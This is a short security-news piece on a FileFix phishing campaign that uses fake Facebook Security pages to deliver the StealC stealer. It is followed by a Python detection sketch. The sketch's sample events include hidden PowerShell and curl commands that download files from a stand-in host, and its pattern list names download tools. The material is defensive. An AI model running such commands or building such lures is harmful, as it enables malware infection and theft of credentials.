
"The observed campaign uses a highly convincing, multilingual phishing site (e.g., fake Facebook Security page), with anti-analysis techniques and advanced obfuscation to evade detection," Acronis security researcher Eliad Kimhy said in a report shared with The Hacker News. At a high level, the attack chain involves the use of FileFix to entice users into launching an initial payload that then proceeds to download seemingly innocuous images containing the malicious components from a Bitbucket repository."
"FileFix, first documented by security researcher mrd0x as a proof-of-concept (PoC) in June 2025, is a little different from ClickFix in that it eschews the need for users to launch the Windows Run dialog and paste an already copied obfuscated command to complete bogus CAPTCHA verification checks on phishing pages set up for this purpose. Instead, it leverages a web browser's file upload feature to deceive users into copying and"
The campaign leverages a FileFix variant to deliver the StealC information stealer. Attackers deploy convincing, multilingual phishing sites that mimic Facebook Security and employ heavy obfuscation, junk code, and fragmentation to hinder analysis. Victims are lured to click an appeal button and are then prompted through a FileFix flow to copy and paste a command into the File Explorer address bar, executing it locally. The initial payload downloads apparently benign images from a Bitbucket repository that contain malicious components, abusing trust in a legitimate hosting platform to evade detection.
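The distinguishing trait of the FileFix flow described above is that the pasted command is launched from the File Explorer address bar, so the resulting shell has explorer.exe as its parent. The following is an added detection sketch (not code from the report or from Acronis) that scores process-creation records on that parent/child pairing plus a network-fetch hint in the command line; the event shape, shell list and sample records are constructed assumptions, not telemetry from this campaign.

```python
"""Toy FileFix-style launch detector over constructed process-creation events."""
import re
from dataclasses import dataclass

# Assumed set of interpreters a pasted address-bar command would typically spawn.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# Assumed hints that the command fetches a remote payload (the report describes
# an initial payload that downloads further components from a repository).
NET_HINTS = re.compile(r"https?://|Invoke-WebRequest|DownloadString|curl\s|certutil|bitsadmin", re.I)


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def is_filefix_like(ev: ProcEvent) -> bool:
    """explorer.exe spawning a shell is also what a Start-menu launch looks like,
    so a network-fetch hint in the command line is required to keep noise down."""
    parent = ev.parent_image.rsplit("\\", 1)[-1].lower()
    child = ev.image.rsplit("\\", 1)[-1].lower()
    return parent == "explorer.exe" and child in SHELLS and bool(NET_HINTS.search(ev.command_line))


# Constructed sample events (not real logs). Only the second one should fire.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe"),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -w hidden -c \"iwr https://example.invalid/img.png -o $env:TEMP\\a\""),
    # Interactive PowerShell opened from the Start menu: explorer parent, no fetch hint.
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe"),
    # Same fetch command, but spawned by an IDE rather than File Explorer.
    ProcEvent(r"C:\Tools\ide.exe", r"C:\Windows\System32\cmd.exe",
              "cmd /c curl https://example.invalid/x -o x"),
]


def detect(events):
    """Return the events that match the FileFix-style launch pattern."""
    return [ev for ev in events if is_filefix_like(ev)]


if __name__ == "__main__":
    for ev in detect(SAMPLE_EVENTS):
        print("suspicious:", ev.command_line)
```

The pattern is a triage aid, not a verdict: a legitimate script run from the address bar would match too, so hits should be reviewed alongside the browser history that preceded them.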
Read at The Hacker News